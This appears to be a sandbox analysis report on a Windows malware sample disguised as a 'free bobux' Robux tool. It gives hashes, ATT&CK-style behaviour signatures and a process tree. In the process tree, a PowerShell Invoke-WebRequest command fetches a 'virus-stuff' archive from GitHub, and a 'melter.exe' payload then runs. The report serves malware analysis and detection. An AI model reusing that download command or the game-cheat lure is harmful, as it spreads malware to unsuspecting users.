Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
11/08/2024, 16:49
240811-vbshgaxhqn 711/08/2024, 16:43
240811-t8m4ksxgmp 811/08/2024, 16:43
240811-t8bqjsxglp 711/08/2024, 16:37
240811-t4xgfssbrg 711/08/2024, 16:36
240811-t4j65axerk 711/08/2024, 16:33
240811-t2qacsxelp 7Analysis
-
max time kernel
172s -
max time network
172s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
-
submitted
11/08/2024, 16:43
General
-
Target
8b1ca6608cf833fa62650ec0ab9310d6_JaffaCakes118.exe
-
Size
23KB
-
MD5
8b1ca6608cf833fa62650ec0ab9310d6
-
SHA1
f9587d784e3dfdbbd2779b5236ce95cfa750eafe
-
SHA256
463bef1a5e059c9ad7e46e7e71f580d36335b0ac7fd3cbb165d88ded95cc5320
-
SHA512
934b6b38d813777ba0fb733e588ef4af5718bbe00ee401253952b66b3f6a154f1e570408b1c2cf820cf4c9d5085b12172fda577345f242bfda8881c4454ebd45
-
SSDEEP
384:J5EhiDq9F5KRvhZfqic+hOzAaXNHpOukAaCNoNLFlZgM+GPCc/k1:JGUq9vKxhZfA+hOzAadJOxCNoTlZgM+T
Malware Config
Signatures
-
Blocklisted process makes network request 6 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Powershell Invoke Web Request.
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 3 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of FindShellTrayWindow 33 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\8b1ca6608cf833fa62650ec0ab9310d6_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\8b1ca6608cf833fa62650ec0ab9310d6_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\SelectOptimize.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe42713cb8,0x7ffe42713cc8,0x7ffe42713cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1856 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6648 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1824,6206764666143885062,7223010478575600656,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F121.tmp\F122.tmp\F123.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1A45.tmp\1A46.tmp\1A47.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 20 /nobreak3⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\967A.tmp\967B.tmp\967C.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\melter.exe"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\melter.exe"1⤵
- System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
152B
MD5b4ae6009e2df12ce252d03722e8f4288
SHA144de96f65d69cbae416767040f887f68f8035928
SHA2567778069a1493fdb62e6326ba673f03d9a8f46bc0eea949aabbbbc00dcdaddf9d
SHA512bb810721e52c77793993470692bb2aab0466f13ed4576e4f4cfa6bc5fcfc59c13552299feb6dfd9642ea07b19a5513d90d0698d09ca1d15e0598133929c05fe1
-
Filesize
152B
MD54bf4b59c3deb1688a480f8e56aab059d
SHA1612c83e7027b3bfb0e9d2c9efad43c5318e731bb
SHA256867ab488aa793057395e9c10f237603cfb180689298871cdf0511132f9628c82
SHA5122ec6c89f9653f810e9f80f532abaff2a3c0276f6d299dce1b1eadf6a59e8072ed601a4f9835db25d4d2610482a00dd5a0852d0ef828678f5c5ed33fe64dddca9
-
Filesize
41KB
MD5a7ee007fb008c17e73216d0d69e254e8
SHA1160d970e6a8271b0907c50268146a28b5918c05e
SHA256414024b478738b35312a098bc7f911300b14396d34718f78886b5942d9afe346
SHA512669bec67d3fc1932a921dd683e6acfdf462b9063e1726770bae8740d83503a799c2e30030f2aca7ec96df0bfd6d8b7f999f8296ee156533302161eb7c9747602
-
Filesize
28KB
MD5f811cd85c6c5d51c50bbba9ef193e90f
SHA15f7eac276710d1b0727314502f16b2908ddf7c2f
SHA2560ddb706695fdaaa1bc625f1278812cf143b367b7c9ada58e6879153acc12d906
SHA5126390c66fc3b1324cc1bbea46c4659c2a8b88b3b59109cc0674b0fb504a11bbd29410f9640314e3bdbbf39d9b9ede2cbaff716cc0cce8912f63ba5a1dd77679bf
-
Filesize
3KB
MD57b38e171adfa19300a70f7007ebbbc4c
SHA1b3c12143500da1b0a968e73f8c77b6641c28d5f7
SHA25665485471347e1abe5fee9aa57d1f3195abbdb6ae7eea6681bef1a237c04e83d9
SHA512046a9aa15ad4262d52e085ef1161dd71e8592a564d3737df8fd73a54bce542ffedc58858d103a34f7f72acf19798cef424499b996e53c6e38f20aaaf815686c4
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
1KB
MD567d8cb54346a38560db29c0808ff1d04
SHA17e33c7124ff65e98e9ab2e7fa510e571c774d8e9
SHA256d3209cdb990f8f9b94345c6db047f95db0a848ff2fd29dfe5b7b865d1a087572
SHA51229939a36efc4a566358ad6498e0f8e7eaaa0b4e43066451137a55574eb96e8277557af0c16c02e7d8480d213c851e3eef1d7e4ed72a6bf8c316e938142163285
-
Filesize
6KB
MD5291e336f50626234bad49230e17fa634
SHA1d3c148392e8976fef4e6a48af9d69689dd464d0f
SHA256f7bae819bfcc60b89781cc9c86bb7a033144d51cbef05b1c73de604c393e5dc9
SHA51239ee39be6a3d44a3e1f30465302ce8da9d8eeb3f711b7340d6bfbf695f01ab7e6d9f1d983b428d3763b32b5bce90cce91167b6b3b9873f23d341a6b0c1c19cba
-
Filesize
6KB
MD59a8cb7268abc303dc355d3ea27d6fb2c
SHA1acf28ca3866e07cd3fb6c1d8dfd4086c32543725
SHA25653df9e3b7346916554a00dd497e9948c9f116906cc54d555e18c731c097d833e
SHA5129930d45529bf8ea2a47a9bccb7982c46b8f7a34bc653e8a64f98e7e5f6ab30c18cfbad3a974a2409bb78fc0e98f3b82c7c00d2e70414cc16a74bbf4b0a7e6d85
-
Filesize
6KB
MD5b07f976fcd300337de845e8e516a4a76
SHA1a8d281bedd9b3cb954c2f7ab6edf1071a32998f1
SHA2562f23185b699204b824f76d10200449f7feabb4707a8bea540f1910b3403cc0c4
SHA5128504b53acfe03ddbb840ee658df20c188aee3861b9bc6720028884dfab47d1b9b4d8c1595f9dcba89e0289dd0d84d01b54977aca9ae7fdc9cb3427651fb75271
-
Filesize
6KB
MD5e8a9a03dd3f14cb8f649ac314469c308
SHA173a94c9050b684e3dce8c2dc4f0f8cc4468f53a3
SHA256636a33e914ecb8654731f69512e118eb2e53739f8e213398a33a132bb9eb1a71
SHA512ef10b46e6a60f4f6d673f15e57da8ccbd63460cce1bef1b79b2dfe57a796288225aa58d794afbdfa23c1bf1bf8d0858d81c2d549db9a25b5718bc92e0cf7c966
-
Filesize
6KB
MD5a602bbe744c3d4ec19582805646b8c3a
SHA19734842770aa26038e14c2041a5348c49c2c30ba
SHA2567b3e0f519b37cadf0e443380e3642282ff912367c02dd9cb4caee7935f2c0c46
SHA512bff5a49eb6fef6c117894f4895dae130a9f0a4e4ce9b3d42ae57224a94726a182c0b976b861038be5b2aa6fd8a4c62a88312d2594bbc334a15e923ed28c6147a
-
Filesize
6KB
MD59ad55d5c8bf1adf27dbdaf4e5941e5af
SHA16c64752745ae44d19cf58e43f61380c2bd09028d
SHA2564991b95f2e3fb523d0d52c8851ad58c2a606cf0d81f5b887611ae3f9ae185c6b
SHA51226e88d5af8a189c5a478e1435a9169cad1c8d65a6a35a9aa62009be62523391cf59b97b0da92728237376ff53e2ef5a69abb90a3e1090759d79b3aaf3295b8ab
-
Filesize
538B
MD5bd1505756c95d0cde6c932c4f6a5bd6e
SHA1767192f7abf57694abc8d1060c7fe41baf498aeb
SHA256f471a027a4fe4e1ed295e5e393df53def8ad49b81a2addf42756d6fefece3b46
SHA512503b9cbf44256a9530453124bd607753465bf93d9c19f69609787a597a2445d7c415035fe42e26c3f152b5a60aa50ad1593be48cb51b6035dcbc81e4278f99d7
-
Filesize
1KB
MD58c2bbac4c47e1914ef3042fa433de918
SHA142ab59ea72f5d224b405bf438e75dc1023762e17
SHA25603a80fd06c0db6bb8f91b1dc30c19a2dac3e39bd9aa31ef58f48077e685a64be
SHA512d7f535588c8726207d964e817e953601e7d2056ca7943bf131153d22a20b89381aefe28e4171bd37879b29e257d03cd6376ca994e318ae4a755de48ff4db801d
-
Filesize
1KB
MD59f3a00c0833e1517d9262069ad6ae3f7
SHA1a8facf31f5b92d0f9cb70a93a5a9e255d607968e
SHA2566204b17ff0fec77580b2d99e8a856fe067fa0d99b4be77d165bcebc54022009f
SHA51237c44f6230ff778c6b30e8fda8f13ec2f1670368a3eff6e67787cf1225c79df8a79713d234e06da0e58e76165fa17c5998d677d6b5b10e3e40ad08456929f59e
-
Filesize
538B
MD55156757c2bedb5dab618114ced6c7bbf
SHA1c4900ff6fc7b2b82fa3790cd441493c82932771a
SHA256dfb63b0bf05254bdf1cfef3181e230ab14438c2a59c0a6617d49604fa7dd8e80
SHA5123341bd66b082a65dc6d577413036a6e95b053d889036f9521759b0bac2c0686fee40476dec62a579fb9c64583826f1d28de5ad7a056cb3870fbb8190aadd4cd3
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD57cc55880f6db2f262801034574bd02ae
SHA153b193334fdc0ac76f5439628a23267d2feb9f13
SHA256a6f40f759bf175d1abedb7c148c12bc5e1ec67a92d935ebc0ae7dc9798df758c
SHA512804a90048fc43fdcdcccdbb2efeb85829cce766407a65e88384ed4bc0aaf86dc2a1f0e4aaddf5986908529f1d9251347f7d6dfb44288d9b8c251120fa1e488f7
-
Filesize
11KB
MD5bb1bf74fc19244f1ea1f4f0caa08df4d
SHA1078717177a0ee1e796770dbfb631cf4f02f1f43d
SHA256164d8bd22f229273865d5c57dad0f6405d182399d8a6abe75ec3e7b23d20c5b7
SHA512ab0e9ad1ea966449a4345b66750c337e19956517442ded804906a13e700a9ef9997cbe0be30695fbe5947c0d5cfe9244fa68cf6f38d53cf7cec52b6e9248ce13
-
Filesize
1KB
MD512ff85d31d9e76455b77e6658cb06bf0
SHA145788e71d4a7fe9fd70b2c0e9494174b01f385eb
SHA2561c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056
SHA512fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f
-
Filesize
1KB
MD535e5f4dac536c65c6061063c0bcc1680
SHA133de1ee54ad4af6ef7de46de372878664e40dbae
SHA25643d8e45c4f9ba7df3e8db0338838023fea62e5d4f0abf87a6fe78c01804893cb
SHA512ba5cb333699e07024d3193061fe883b4a88351ed9bfb387342ae76811874d8707cde193fd986746ad95b172e0941f56c810121af478b95120806106239408c31
-
Filesize
867B
MD5addedb06062eef1e06beb01c81ede139
SHA1fe92bda282254358c287991cd4020f393a3393fe
SHA25698c6a0254f64be056923053dff9619232013371b7326bd539d5e1717d7844c3f
SHA512a892597d9fed1cf6fb34d810ac3385a0e3c2ab03ecb09434eb2252d2cedc3f11c018a0d077a670113a18dcabeddb0f50fc6eda33b7e5ae078bf99d13e8874123
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
